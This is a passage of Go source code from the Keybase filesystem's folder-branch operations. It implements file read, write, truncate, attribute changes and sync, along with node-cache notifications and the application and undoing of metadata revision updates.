fbo.deferLog.CDebugf(ctx, "Done: %v", err) }() err = fbo.checkNode(file) if err != nil { return 0, err } filePath, err := fbo.pathFromNodeForRead(file) if err != nil { return 0, err } { // It seems git isn't handling EINTR from some of its read calls (likely // fread), which causes it to get corrupted data (which leads to coredumps // later) when a read system call on pack files gets interrupted. 
This // enables delayed cancellation for Read if the file path contains `.git`. // // TODO: get a patch in git, wait for sufficiently long time for people to // upgrade, and remove this. // allow turning this feature off by env var to make life easier when we // try to fix git. if _, isSet := os.LookupEnv("KBFS_DISABLE_GIT_SPECIAL_CASE"); !isSet { for _, n := range filePath.path { if n.Name == ".git" { EnableDelayedCancellationWithGracePeriod(ctx, fbo.config.DelayedCancellationGracePeriod()) break } } } } // Don't let the goroutine below write directly to the return // variable, since if the context is canceled the goroutine might // outlast this function call, and end up in a read/write race // with the caller. var bytesRead int64 err = runUnlessCanceled(ctx, func() error { lState := makeFBOLockState() // verify we have permission to read md, err := fbo.getMDForReadNeedIdentify(ctx, lState) if err != nil { return err } bytesRead, err = fbo.blocks.Read( ctx, lState, md.ReadOnly(), filePath, dest, off) return err }) if err != nil { return 0, err } return bytesRead, nil } func (fbo *folderBranchOps) Write( ctx context.Context, file Node, data []byte, off int64) (err error) { fbo.log.CDebugf(ctx, "Write %p %d %d", file.GetID(), len(data), off) defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }() err = fbo.checkNode(file) if err != nil { return err } return runUnlessCanceled(ctx, func() error { lState := makeFBOLockState() // Get the MD for reading. We won't modify it; we'll track the // unref changes on the side, and put them into the MD during the // sync. 
		md, err := fbo.getMDLocked(ctx, lState, mdReadNeedIdentify)
		if err != nil {
			return err
		}

		err = fbo.blocks.Write(
			ctx, lState, md.ReadOnly(), file, data, off)
		if err != nil {
			return err
		}

		fbo.status.addDirtyNode(file)
		return nil
	})
}

// Truncate changes the given file's length to size in the dirty block
// cache; the change reaches the servers only on a later Sync.
func (fbo *folderBranchOps) Truncate(
	ctx context.Context, file Node, size uint64) (err error) {
	fbo.log.CDebugf(ctx, "Truncate %p %d", file.GetID(), size)
	defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }()

	err = fbo.checkNode(file)
	if err != nil {
		return err
	}

	return runUnlessCanceled(ctx, func() error {
		lState := makeFBOLockState()

		// Get the MD for reading.  We won't modify it; we'll track the
		// unref changes on the side, and put them into the MD during the
		// sync.
		md, err := fbo.getMDLocked(ctx, lState, mdReadNeedIdentify)
		if err != nil {
			return err
		}

		err = fbo.blocks.Truncate(
			ctx, lState, md.ReadOnly(), file, size)
		if err != nil {
			return err
		}

		fbo.status.addDirtyNode(file)
		return nil
	})
}

// setExLocked toggles the executable bit on the given file's entry
// and finalizes a corresponding setAttrOp.  mdWriterLock must be held
// by the caller.
func (fbo *folderBranchOps) setExLocked(
	ctx context.Context, lState *lockState, file path,
	ex bool) (err error) {
	fbo.mdWriterLock.AssertLocked(lState)

	// verify we have permission to write
	md, err := fbo.getMDForWriteLocked(ctx, lState)
	if err != nil {
		return
	}

	dblock, de, err := fbo.blocks.GetDirtyParentAndEntry(
		ctx, lState, md.ReadOnly(), file)
	if err != nil {
		return err
	}

	// If the file is a symlink, do nothing (to match ext4
	// behavior).
	if de.Type == Sym || de.Type == Dir {
		fbo.log.CDebugf(ctx, "Ignoring setex on type %s", de.Type)
		return nil
	}

	if ex && (de.Type == File) {
		de.Type = Exec
	} else if !ex && (de.Type == Exec) {
		de.Type = File
	} else {
		// Treating this as a no-op, without updating the ctime, is a
		// POSIX violation, but it's an important optimization to keep
		// permissions-preserving rsyncs fast.
		fbo.log.CDebugf(ctx, "Ignoring no-op setex")
		return nil
	}

	de.Ctime = fbo.nowUnixNano()

	parentPath := file.parentPath()
	sao, err := newSetAttrOp(file.tailName(), parentPath.tailPointer(),
		exAttr, file.tailPointer())
	if err != nil {
		return err
	}

	// If the MD doesn't match the MD expected by the path, that
	// implies we are using a cached path, which implies the node has
	// been unlinked.  In that case, we can safely ignore this setex.
	if md.data.Dir.BlockPointer != file.path[0].BlockPointer {
		fbo.log.CDebugf(ctx, "Skipping setex for a removed file %v",
			file.tailPointer())
		fbo.blocks.UpdateCachedEntryAttributesOnRemovedFile(
			ctx, lState, sao, de)
		return nil
	}

	md.AddOp(sao)

	dblock.Children[file.tailName()] = de
	_, err = fbo.syncBlockAndFinalizeLocked(
		ctx, lState, md, dblock, *parentPath.parentPath(), parentPath.tailName(),
		Dir, false, false, zeroPtr, NoExcl)
	return err
}

// SetEx sets or clears the executable bit on the given file node.
func (fbo *folderBranchOps) SetEx(
	ctx context.Context, file Node, ex bool) (err error) {
	fbo.log.CDebugf(ctx, "SetEx %p %t", file.GetID(), ex)
	defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }()

	err = fbo.checkNode(file)
	if err != nil {
		return
	}

	return fbo.doMDWriteWithRetryUnlessCanceled(ctx,
		func(lState *lockState) error {
			filePath, err := fbo.pathFromNodeForMDWriteLocked(lState, file)
			if err != nil {
				return err
			}

			return fbo.setExLocked(ctx, lState, filePath, ex)
		})
}

// setMtimeLocked updates the given file's mtime (and, as a
// consequence, its ctime) and finalizes a corresponding setAttrOp.
// mdWriterLock must be held by the caller.
func (fbo *folderBranchOps) setMtimeLocked(
	ctx context.Context, lState *lockState, file path,
	mtime *time.Time) error {
	fbo.mdWriterLock.AssertLocked(lState)

	// verify we have permission to write
	md, err := fbo.getMDForWriteLocked(ctx, lState)
	if err != nil {
		return err
	}

	dblock, de, err := fbo.blocks.GetDirtyParentAndEntry(
		ctx, lState, md.ReadOnly(), file)
	if err != nil {
		return err
	}
	de.Mtime = mtime.UnixNano()
	// setting the mtime counts as changing the file MD, so must set ctime too
	de.Ctime = fbo.nowUnixNano()

	parentPath := file.parentPath()
	sao, err := newSetAttrOp(file.tailName(), parentPath.tailPointer(), mtimeAttr,
		file.tailPointer())
	if err != nil {
		return err
	}

	// If the MD doesn't match the MD expected by the path, that
	// implies we are using a cached path, which implies the node has
	// been unlinked.  In that case, we can safely ignore this
	// setmtime.
	if md.data.Dir.BlockPointer != file.path[0].BlockPointer {
		fbo.log.CDebugf(ctx, "Skipping setmtime for a removed file %v",
			file.tailPointer())
		fbo.blocks.UpdateCachedEntryAttributesOnRemovedFile(
			ctx, lState, sao, de)
		return nil
	}

	md.AddOp(sao)

	dblock.Children[file.tailName()] = de
	_, err = fbo.syncBlockAndFinalizeLocked(
		ctx, lState, md, dblock, *parentPath.parentPath(), parentPath.tailName(),
		Dir, false, false, zeroPtr, NoExcl)
	return err
}

// SetMtime sets the modification time of the given file node.  A nil
// mtime is treated as a no-op (some OSes, e.g. OSX, send it when
// setting only the atime).
func (fbo *folderBranchOps) SetMtime(
	ctx context.Context, file Node, mtime *time.Time) (err error) {
	fbo.log.CDebugf(ctx, "SetMtime %p %v", file.GetID(), mtime)
	defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }()

	if mtime == nil {
		// Can happen on some OSes (e.g. OSX) when trying to set the atime only
		return nil
	}

	err = fbo.checkNode(file)
	if err != nil {
		return
	}

	return fbo.doMDWriteWithRetryUnlessCanceled(ctx,
		func(lState *lockState) error {
			filePath, err := fbo.pathFromNodeForMDWriteLocked(lState, file)
			if err != nil {
				return err
			}

			return fbo.setMtimeLocked(ctx, lState, filePath, mtime)
		})
}

// syncLocked flushes the given file's dirty blocks to the servers and
// finalizes an MD write for them.  Returns whether the file remains
// dirty.  mdWriterLock must be held by the caller.
func (fbo *folderBranchOps) syncLocked(ctx context.Context,
	lState *lockState, file path) (stillDirty bool, err error) {
	fbo.mdWriterLock.AssertLocked(lState)

	// if the cache for this file isn't dirty, we're done
	if !fbo.blocks.IsDirty(lState, file) {
		return false, nil
	}

	// Verify we have permission to write.  We do this after the dirty
	// check because otherwise readers who sync clean files on close
	// would get an error.
	md, err := fbo.getMDForWriteLocked(ctx, lState)
	if err != nil {
		return true, err
	}

	// If the MD doesn't match the MD expected by the path, that
	// implies we are using a cached path, which implies the node has
	// been unlinked.  In that case, we can safely ignore this sync.
	if md.data.Dir.BlockPointer != file.path[0].BlockPointer {
		fbo.log.CDebugf(ctx, "Skipping sync for a removed file %v",
			file.tailPointer())
		// Removing the cached info here is a little sketchy,
		// since there's no guarantee that this sync comes
		// from closing the file, and we still want to serve
		// stat calls accurately if the user still has an open
		// handle to this file. TODO: Hook this in with the
		// node cache GC logic to be perfectly accurate.
		return true, fbo.blocks.ClearCacheInfo(lState, file)
	}

	_, uid, err := fbo.config.KBPKI().GetCurrentUserInfo(ctx)
	if err != nil {
		return true, err
	}

	// notify the daemon that a write is being performed
	fbo.config.Reporter().Notify(ctx, writeNotification(file, false))
	defer fbo.config.Reporter().Notify(ctx, writeNotification(file, true))

	// Filled in by doBlockPuts below.
	var blocksToRemove []BlockPointer
	fblock, bps, lbc, syncState, err :=
		fbo.blocks.StartSync(ctx, lState, md, uid, file)
	defer func() {
		fbo.blocks.CleanupSyncState(
			ctx, lState, md.ReadOnly(), file, blocksToRemove, syncState, err)
	}()
	if err != nil {
		return true, err
	}

	newPath, _, newBps, err :=
		fbo.syncBlockAndCheckEmbedLocked(
			ctx, lState, md, fblock, *file.parentPath(),
			file.tailName(), File, true, true, zeroPtr, lbc)
	if err != nil {
		return true, err
	}

	bps.mergeOtherBps(newBps)

	// Note: We explicitly don't call fbo.fbm.cleanUpBlockState here
	// when there's an error, because it's possible some of the blocks
	// will be reused in a future attempt at this same sync, and we
	// don't want them cleaned up in that case.  Instead, the
	// FinishSync call below will take care of that.
	blocksToRemove, err = doBlockPuts(ctx, fbo.config.BlockServer(),
		fbo.config.BlockCache(), fbo.config.Reporter(), fbo.log, md.TlfID(),
		md.GetTlfHandle().GetCanonicalName(), *bps)
	if err != nil {
		return true, err
	}

	err = fbo.finalizeMDWriteLocked(ctx, lState, md, bps, NoExcl)
	if err != nil {
		return true, err
	}

	// At this point, all reads through the old path (i.e., file)
	// see writes that happened since StartSync, whereas all reads
	// through the new path (newPath) don't.
	//
	// TODO: This isn't completely correct, since reads that
	// happen after a write should always see the new data.
	//
	// After FinishSync succeeds, then reads through both the old
	// and the new paths will see the writes that happened during
	// the sync.

	return fbo.blocks.FinishSync(ctx, lState, file, newPath,
		md.ReadOnly(), syncState, fbo.fbm)
}

// Sync flushes any dirty data for the given file node to the servers,
// and clears the node's dirty status if nothing remains dirty.
func (fbo *folderBranchOps) Sync(ctx context.Context, file Node) (err error) {
	fbo.log.CDebugf(ctx, "Sync %p", file.GetID())
	defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }()

	err = fbo.checkNode(file)
	if err != nil {
		return
	}

	var stillDirty bool
	err = fbo.doMDWriteWithRetryUnlessCanceled(ctx,
		func(lState *lockState) error {
			filePath, err := fbo.pathFromNodeForMDWriteLocked(lState, file)
			if err != nil {
				return err
			}

			stillDirty, err = fbo.syncLocked(ctx, lState, filePath)
			return err
		})
	if err != nil {
		return err
	}

	if !stillDirty {
		fbo.status.rmDirtyNode(file)
	}

	return nil
}

// FolderStatus returns the current status of this folder/branch,
// along with a channel that signals future status updates.
func (fbo *folderBranchOps) FolderStatus(
	ctx context.Context, folderBranch FolderBranch) (
	fbs FolderBranchStatus, updateChan <-chan StatusUpdate, err error) {
	fbo.log.CDebugf(ctx, "Status")
	defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }()

	if folderBranch != fbo.folderBranch {
		return FolderBranchStatus{}, nil,
			WrongOpsError{fbo.folderBranch, folderBranch}
	}

	return fbo.status.getStatus(ctx)
}

// Status is a global (non-folder) status query; it is not valid on a
// per-folder ops object, so it always fails with InvalidOpError.
func (fbo *folderBranchOps) Status(
	ctx context.Context) (
	fbs KBFSStatus, updateChan <-chan StatusUpdate, err error) {
	return KBFSStatus{}, nil, InvalidOpError{}
}

// RegisterForChanges registers a single Observer to receive
// notifications about this folder/branch.
func (fbo *folderBranchOps) RegisterForChanges(obs Observer) error {
	// It's the caller's responsibility to make sure
	// RegisterForChanges isn't called twice for the same Observer
	fbo.observers.add(obs)
	return nil
}

// UnregisterFromChanges stops an Observer from getting notifications
// about the folder/branch.
func (fbo *folderBranchOps) UnregisterFromChanges(obs Observer) error {
	fbo.observers.remove(obs)
	return nil
}

// notifyBatchLocked sends out a notification for the most recent op
// in md.
func (fbo *folderBranchOps) notifyBatchLocked(
	ctx context.Context, lState *lockState, md ImmutableRootMetadata) {
	fbo.headLock.AssertLocked(lState)

	lastOp := md.data.Changes.Ops[len(md.data.Changes.Ops)-1]
	fbo.notifyOneOpLocked(ctx, lState, lastOp, md)
	fbo.editHistory.UpdateHistory(ctx, []ImmutableRootMetadata{md})
}

// searchForNode tries to figure out the path to the given
// blockPointer, using only the block updates that happened as part of
// a given MD update operation.
func (fbo *folderBranchOps) searchForNode(ctx context.Context,
	ptr BlockPointer, md ReadOnlyRootMetadata) (Node, error) {
	// Record which pointers are new to this update, and thus worth
	// searching.
	newPtrs := make(map[BlockPointer]bool)
	for _, op := range md.data.Changes.Ops {
		for _, update := range op.AllUpdates() {
			newPtrs[update.Ref] = true
		}
		for _, ref := range op.Refs() {
			newPtrs[ref] = true
		}
	}

	nodeMap, _, err := fbo.blocks.SearchForNodes(ctx, fbo.nodeCache,
		[]BlockPointer{ptr}, newPtrs, md)
	if err != nil {
		return nil, err
	}

	n, ok := nodeMap[ptr]
	if !ok {
		return nil, NodeNotFoundError{ptr}
	}

	return n, nil
}

// unlinkFromCache removes the cache entry for name under the given
// node, trying every unref'd pointer in op since we don't know which
// one corresponds to the removed entry.
func (fbo *folderBranchOps) unlinkFromCache(op op, oldDir BlockPointer,
	node Node, name string) error {
	// The entry could be under any one of the unref'd blocks, and
	// it's safe to perform this when the pointer isn't real, so just
	// try them all to avoid the overhead of looking up the right
	// pointer in the old version of the block.
	p, err := fbo.pathFromNodeForRead(node)
	if err != nil {
		return err
	}

	childPath := p.ChildPathNoPtr(name)

	// revert the parent pointer
	childPath.path[len(childPath.path)-2].BlockPointer = oldDir
	for _, ptr := range op.Unrefs() {
		childPath.path[len(childPath.path)-1].BlockPointer = ptr
		fbo.nodeCache.Unlink(ptr.ref(), childPath)
	}

	return nil
}

// notifyOneOpLocked translates a single metadata op into local node
// cache updates and observer notifications.  headLock must be held by
// the caller.
func (fbo *folderBranchOps) notifyOneOpLocked(ctx context.Context,
	lState *lockState, op op, md ImmutableRootMetadata) {
	fbo.headLock.AssertLocked(lState)

	fbo.blocks.UpdatePointers(lState, op)

	var changes []NodeChange
	switch realOp := op.(type) {
	default:
		return
	case *createOp:
		node := fbo.nodeCache.Get(realOp.Dir.Ref.ref())
		if node == nil {
			return
		}
		fbo.log.CDebugf(ctx, "notifyOneOp: create %s in node %p",
			realOp.NewName, node.GetID())
		changes = append(changes, NodeChange{
			Node:       node,
			DirUpdated: []string{realOp.NewName},
		})
	case *rmOp:
		node := fbo.nodeCache.Get(realOp.Dir.Ref.ref())
		if node == nil {
			return
		}
		fbo.log.CDebugf(ctx, "notifyOneOp: remove %s in node %p",
			realOp.OldName, node.GetID())
		changes = append(changes, NodeChange{
			Node:       node,
			DirUpdated: []string{realOp.OldName},
		})

		// If this node exists, then the child node might exist too,
		// and we need to unlink it in the node cache.
		err := fbo.unlinkFromCache(op, realOp.Dir.Unref, node, realOp.OldName)
		if err != nil {
			fbo.log.CErrorf(ctx, "Couldn't unlink from cache: %v", err)
			return
		}
	case *renameOp:
		oldNode := fbo.nodeCache.Get(realOp.OldDir.Ref.ref())
		if oldNode != nil {
			changes = append(changes, NodeChange{
				Node:       oldNode,
				DirUpdated: []string{realOp.OldName},
			})
		}
		var newNode Node
		if realOp.NewDir.Ref != zeroPtr {
			newNode = fbo.nodeCache.Get(realOp.NewDir.Ref.ref())
			if newNode != nil {
				changes = append(changes, NodeChange{
					Node:       newNode,
					DirUpdated: []string{realOp.NewName},
				})
			}
		} else {
			newNode = oldNode
			if oldNode != nil {
				// Add another name to the existing NodeChange.
				changes[len(changes)-1].DirUpdated =
					append(changes[len(changes)-1].DirUpdated, realOp.NewName)
			}
		}

		if oldNode != nil {
			var newNodeID NodeID
			if newNode != nil {
				newNodeID = newNode.GetID()
			}
			fbo.log.CDebugf(ctx, "notifyOneOp: rename %v from %s/%p to %s/%p",
				realOp.Renamed, realOp.OldName, oldNode.GetID(), realOp.NewName,
				newNodeID)

			if newNode == nil {
				if childNode :=
					fbo.nodeCache.Get(realOp.Renamed.ref()); childNode != nil {
					// if the childNode exists, we still have to update
					// its path to go through the new node.  That means
					// creating nodes for all the intervening paths.
					// Unfortunately we don't have enough information to
					// know what the newPath is; we have to guess it from
					// the updates.
					var err error
					newNode, err =
						fbo.searchForNode(ctx, realOp.NewDir.Ref, md.ReadOnly())
					if newNode == nil {
						fbo.log.CErrorf(ctx, "Couldn't find the new node: %v", err)
					}
				}
			}

			if newNode != nil {
				// If new node exists as well, unlink any previously
				// existing entry and move the node.
				var unrefPtr BlockPointer
				if oldNode != newNode {
					unrefPtr = realOp.NewDir.Unref
				} else {
					unrefPtr = realOp.OldDir.Unref
				}
				err := fbo.unlinkFromCache(op, unrefPtr, newNode, realOp.NewName)
				if err != nil {
					fbo.log.CErrorf(ctx, "Couldn't unlink from cache: %v", err)
					return
				}
				err = fbo.nodeCache.Move(realOp.Renamed.ref(), newNode,
					realOp.NewName)
				if err != nil {
					fbo.log.CErrorf(ctx, "Couldn't move node in cache: %v", err)
					return
				}
			}
		}
	case *syncOp:
		node := fbo.nodeCache.Get(realOp.File.Ref.ref())
		if node == nil {
			return
		}
		fbo.log.CDebugf(ctx, "notifyOneOp: sync %d writes in node %p",
			len(realOp.Writes), node.GetID())

		changes = append(changes, NodeChange{
			Node:        node,
			FileUpdated: realOp.Writes,
		})
	case *setAttrOp:
		node := fbo.nodeCache.Get(realOp.Dir.Ref.ref())
		if node == nil {
			return
		}
		fbo.log.CDebugf(ctx, "notifyOneOp: setAttr %s for file %s in node %p",
			realOp.Attr, realOp.Name, node.GetID())

		p, err := fbo.pathFromNodeForRead(node)
		if err != nil {
			return
		}

		childNode, err := fbo.blocks.UpdateCachedEntryAttributes(
			ctx, lState, md.ReadOnly(), p, realOp)
		if err != nil {
			// TODO: Log error?
			return
		}
		if childNode == nil {
			return
		}

		changes = append(changes, NodeChange{
			Node: childNode,
		})
	case *gcOp:
		// Unreferenced blocks in a gcOp mean that we shouldn't cache
		// them anymore
		bcache := fbo.config.BlockCache()
		for _, ptr := range realOp.Unrefs() {
			if err := bcache.DeleteTransient(ptr, fbo.id()); err != nil {
				fbo.log.CDebugf(ctx,
					"Couldn't delete transient entry for %v: %v", ptr, err)
			}
		}
	case *resolutionOp:
		// If there are any unrefs of blocks that have a node, this is an
		// implied rmOp (see KBFS-1424).
		reverseUpdates := make(map[BlockPointer]BlockPointer)
		for _, unref := range op.Unrefs() {
			// TODO: I will add logic here to unlink and invalidate any
			// corresponding unref'd nodes.
			node := fbo.nodeCache.Get(unref.ref())
			if node == nil {
				// TODO: even if we don't have the node that was
				// unreferenced, we might have its parent, and that
				// parent might need an invalidation.
				continue
			}

			// If there is a node, unlink and invalidate.
			p, err := fbo.pathFromNodeForRead(node)
			if err != nil {
				fbo.log.CErrorf(ctx, "Couldn't get path: %v", err)
				continue
			}
			if !p.hasValidParent() {
				fbo.log.CErrorf(ctx, "Removed node %s has no parent", p)
				continue
			}
			parentPath := p.parentPath()
			parentNode := fbo.nodeCache.Get(parentPath.tailPointer().ref())
			if parentNode != nil {
				changes = append(changes, NodeChange{
					Node:       parentNode,
					DirUpdated: []string{p.tailName()},
				})
			}

			fbo.log.CDebugf(ctx, "resolutionOp: remove %s, node %p",
				p.tailPointer(), node.GetID())
			// Revert the path back to the original BlockPointers,
			// before the updates were applied.
			if len(reverseUpdates) == 0 {
				for _, update := range op.AllUpdates() {
					reverseUpdates[update.Ref] = update.Unref
				}
			}
			for i, pNode := range p.path {
				if oldPtr, ok := reverseUpdates[pNode.BlockPointer]; ok {
					p.path[i].BlockPointer = oldPtr
				}
			}
			fbo.nodeCache.Unlink(p.tailPointer().ref(), p)
		}

		if len(changes) == 0 {
			return
		}
	}

	fbo.observers.batchChanges(ctx, changes)
}

// getCurrMDRevisionLocked returns the revision of the current head,
// or MetadataRevisionUninitialized if there is no head yet.  headLock
// must be held (read or write) by the caller.
func (fbo *folderBranchOps) getCurrMDRevisionLocked(lState *lockState) MetadataRevision {
	fbo.headLock.AssertAnyLocked(lState)

	if fbo.head != (ImmutableRootMetadata{}) {
		return fbo.head.Revision()
	}
	return MetadataRevisionUninitialized
}

// getCurrMDRevision is the lock-taking wrapper around
// getCurrMDRevisionLocked.
func (fbo *folderBranchOps) getCurrMDRevision(
	lState *lockState) MetadataRevision {
	fbo.headLock.RLock(lState)
	defer fbo.headLock.RUnlock(lState)
	return fbo.getCurrMDRevisionLocked(lState)
}

// applyMDUpdatesFunc is the signature shared by the locked/unlocked
// MD-update appliers, so they can be passed to getAndApplyMDUpdates.
type applyMDUpdatesFunc func(context.Context, *lockState, []ImmutableRootMetadata) error

// applyMDUpdatesLocked applies a batch of newly-fetched merged MDs to
// the local head and sends the corresponding notifications.
// mdWriterLock must be held by the caller.
func (fbo *folderBranchOps) applyMDUpdatesLocked(ctx context.Context,
	lState *lockState, rmds []ImmutableRootMetadata) error {
	fbo.mdWriterLock.AssertLocked(lState)

	fbo.headLock.Lock(lState)
	defer fbo.headLock.Unlock(lState)

	// if we have staged changes, ignore all updates until conflict
	// resolution kicks in.  TODO: cache these for future use.
	if !fbo.isMasterBranchLocked(lState) {
		if len(rmds) > 0 {
			// setHeadLocked takes care of merged case
			fbo.setLatestMergedRevisionLocked(ctx, lState,
				rmds[len(rmds)-1].Revision(), false)

			unmergedRev := MetadataRevisionUninitialized
			if fbo.head != (ImmutableRootMetadata{}) {
				unmergedRev = fbo.head.Revision()
			}
			fbo.cr.Resolve(unmergedRev, rmds[len(rmds)-1].Revision())
		}
		return UnmergedError{}
	}

	// Don't allow updates while we're in the dirty state; the next
	// sync will put us into an unmerged state anyway and we'll
	// require conflict resolution.
	if fbo.blocks.GetState(lState) != cleanState {
		return errors.New("Ignoring MD updates while writes are dirty")
	}

	appliedRevs := make([]ImmutableRootMetadata, 0, len(rmds))
	for _, rmd := range rmds {
		// check that we're applying the expected MD revision
		if rmd.Revision() <= fbo.getCurrMDRevisionLocked(lState) {
			// Already caught up!
			continue
		}
		if err := isReadableOrError(ctx, fbo.config, rmd.ReadOnly()); err != nil {
			return err
		}

		err := fbo.setHeadSuccessorLocked(ctx, lState, rmd, false)
		if err != nil {
			return err
		}
		// No new operations in these.
		if rmd.IsWriterMetadataCopiedSet() {
			continue
		}
		for _, op := range rmd.data.Changes.Ops {
			fbo.notifyOneOpLocked(ctx, lState, op, rmd)
		}
		appliedRevs = append(appliedRevs, rmd)
	}
	if len(appliedRevs) > 0 {
		fbo.editHistory.UpdateHistory(ctx, appliedRevs)
	}
	return nil
}

// undoMDUpdatesLocked rolls the local head backwards through the
// given MDs, inverting each of their ops for local notifications.
// mdWriterLock must be held by the caller.
func (fbo *folderBranchOps) undoMDUpdatesLocked(ctx context.Context,
	lState *lockState, rmds []ImmutableRootMetadata) error {
	fbo.mdWriterLock.AssertLocked(lState)

	fbo.headLock.Lock(lState)
	defer fbo.headLock.Unlock(lState)

	// Don't allow updates while we're in the dirty state; the next
	// sync will put us into an unmerged state anyway and we'll
	// require conflict resolution.
	if fbo.blocks.GetState(lState) != cleanState {
		return NotPermittedWhileDirtyError{}
	}

	// go backwards through the updates
	for i := len(rmds) - 1; i >= 0; i-- {
		rmd := rmds[i]
		// on undo, it's ok to re-apply the current revision since you
		// need to invert all of its ops.
		//
		// This duplicates a check in
		// fbo.setHeadPredecessorLocked. TODO: Remove this
		// duplication.
		if rmd.Revision() != fbo.getCurrMDRevisionLocked(lState) &&
			rmd.Revision() != fbo.getCurrMDRevisionLocked(lState)-1 {
			return MDUpdateInvertError{rmd.Revision(),
				fbo.getCurrMDRevisionLocked(lState)}
		}

		// TODO: Check that the revisions are equal only for
		// the first iteration.
		if rmd.Revision() < fbo.getCurrMDRevisionLocked(lState) {
			err := fbo.setHeadPredecessorLocked(ctx, lState, rmd)
			if err != nil {
				return err
			}
		}

		// iterate the ops in reverse and invert each one
		ops := rmd.data.Changes.Ops
		for j := len(ops) - 1; j >= 0; j-- {
			io, err := invertOpForLocalNotifications(ops[j])
			if err != nil {
				fbo.log.CWarningf(ctx,
					"got error %v when invert op %v; "+
						"skipping. Open file handles "+
						"may now be in an invalid "+
						"state, which can be fixed by "+
						"either closing them all or "+
						"restarting KBFS.",
					err, ops[j])
				continue
			}
			fbo.notifyOneOpLocked(ctx, lState, io, rmd)
		}
	}
	// TODO: update the edit history?
	return nil
}

// applyMDUpdates is the lock-taking wrapper around
// applyMDUpdatesLocked.
func (fbo *folderBranchOps) applyMDUpdates(ctx context.Context,
	lState *lockState, rmds []ImmutableRootMetadata) error {
	fbo.mdWriterLock.Lock(lState)
	defer fbo.mdWriterLock.Unlock(lState)
	return fbo.applyMDUpdatesLocked(ctx, lState, rmds)
}

// getLatestMergedRevision returns the most recent merged revision
// this client has seen, under headLock.
func (fbo *folderBranchOps) getLatestMergedRevision(lState *lockState) MetadataRevision {
	fbo.headLock.RLock(lState)
	defer fbo.headLock.RUnlock(lState)
	return fbo.latestMergedRevision
}

// caller should have held fbo.headLock
func (fbo *folderBranchOps) setLatestMergedRevisionLocked(ctx context.Context,
	lState *lockState, rev MetadataRevision, allowBackward bool) {
	fbo.headLock.AssertLocked(lState)

	if fbo.latestMergedRevision < rev || allowBackward {
		fbo.latestMergedRevision = rev
		fbo.log.CDebugf(ctx, "Updated latestMergedRevision to %d.", rev)
	} else {
		fbo.log.CDebugf(ctx, "Local latestMergedRevision (%d) is higher than "+
			"the new revision (%d); won't update.", fbo.latestMergedRevision, rev)
	}
}

// Assumes all necessary locking is either already done by caller, or
// is done by applyFunc.
func (fbo *folderBranchOps) getAndApplyMDUpdates(ctx context.Context,
	lState *lockState, applyFunc applyMDUpdatesFunc) error {
	// first look up all MD revisions newer than my current head
	start := fbo.getLatestMergedRevision(lState) + 1
	rmds, err := getMergedMDUpdates(ctx, fbo.config, fbo.id(), start)
	if err != nil {
		return err
	}

	err = applyFunc(ctx, lState, rmds)
	if err != nil {
		return err
	}
	return nil
}

// getAndApplyNewestUnmergedHead fetches the latest unmerged revision
// for the current branch and applies it as a head successor.
func (fbo *folderBranchOps) getAndApplyNewestUnmergedHead(ctx context.Context,
	lState *lockState) error {
	fbo.log.CDebugf(ctx, "Fetching the newest unmerged head")
	bid := func() BranchID {
		fbo.mdWriterLock.Lock(lState)
		defer fbo.mdWriterLock.Unlock(lState)
		return fbo.bid
	}()

	// We can only ever be at most one revision behind, so fetch the
	// latest unmerged revision and apply it as a successor.
	md, err := fbo.config.MDOps().GetUnmergedForTLF(ctx, fbo.id(), bid)
	if err != nil {
		return err
	}

	if md == (ImmutableRootMetadata{}) {
		// There is no unmerged revision, oops!
		return errors.New("Couldn't find an unmerged head")
	}

	fbo.mdWriterLock.Lock(lState)
	defer fbo.mdWriterLock.Unlock(lState)
	if fbo.bid != bid {
		// The branches switched (apparently CR completed), so just
		// try again.
		fbo.log.CDebugf(ctx, "Branches switched while fetching unmerged head")
		return nil
	}

	fbo.headLock.Lock(lState)
	defer fbo.headLock.Unlock(lState)
	if err := fbo.setHeadSuccessorLocked(ctx, lState, md, false); err != nil {
		return err
	}
	fbo.notifyBatchLocked(ctx, lState, md)
	if err := fbo.config.MDCache().Put(md); err != nil {
		return err
	}
	return nil
}

// getUnmergedMDUpdates returns a slice of the unmerged MDs for this
// TLF's current unmerged branch and unmerged branch, between the
// merge point for the branch and the current head.  The returned MDs
// are the same instances that are stored in the MD cache, so they
// should be modified with care.
func (fbo *folderBranchOps) getUnmergedMDUpdates(
	ctx context.Context, lState *lockState) (
	MetadataRevision, []ImmutableRootMetadata, error) {
	// acquire mdWriterLock to read the current branch ID.
	bid := func() BranchID {
		fbo.mdWriterLock.Lock(lState)
		defer fbo.mdWriterLock.Unlock(lState)
		return fbo.bid
	}()
	return getUnmergedMDUpdates(ctx, fbo.config, fbo.id(),
		bid, fbo.getCurrMDRevision(lState))
}

// getUnmergedMDUpdatesLocked is the variant of getUnmergedMDUpdates
// for callers already holding mdWriterLock.
func (fbo *folderBranchOps) getUnmergedMDUpdatesLocked(
	ctx context.Context, lState *lockState) (
	MetadataRevision, []ImmutableRootMetadata, error) {
	fbo.mdWriterLock.AssertLocked(lState)

	return getUnmergedMDUpdates(ctx, fbo.config, fbo.id(),
		fbo.bid, fbo.getCurrMDRevision(lState))
}

// Returns a list of block pointers that were created during the
// staged era.
// undoUnmergedMDUpdatesLocked rolls the head back past all unmerged
// MDs to the branch point and re-establishes the merged head there,
// returning every block pointer referenced during the staged era.
// mdWriterLock must be held by the caller.
func (fbo *folderBranchOps) undoUnmergedMDUpdatesLocked(
	ctx context.Context, lState *lockState) ([]BlockPointer, error) {
	fbo.mdWriterLock.AssertLocked(lState)

	currHead, unmergedRmds, err := fbo.getUnmergedMDUpdatesLocked(ctx, lState)
	if err != nil {
		return nil, err
	}

	err = fbo.undoMDUpdatesLocked(ctx, lState, unmergedRmds)
	if err != nil {
		return nil, err
	}

	// We have arrived at the branch point.  The new root is
	// the previous revision from the current head.  Find it
	// and apply.  TODO: somehow fake the current head into
	// being currHead-1, so that future calls to
	// applyMDUpdates will fetch this along with the rest of
	// the updates.
	fbo.setBranchIDLocked(lState, NullBranchID)

	rmd, err := getSingleMD(ctx, fbo.config, fbo.id(), NullBranchID,
		currHead, Merged)
	if err != nil {
		return nil, err
	}
	err = func() error {
		fbo.headLock.Lock(lState)
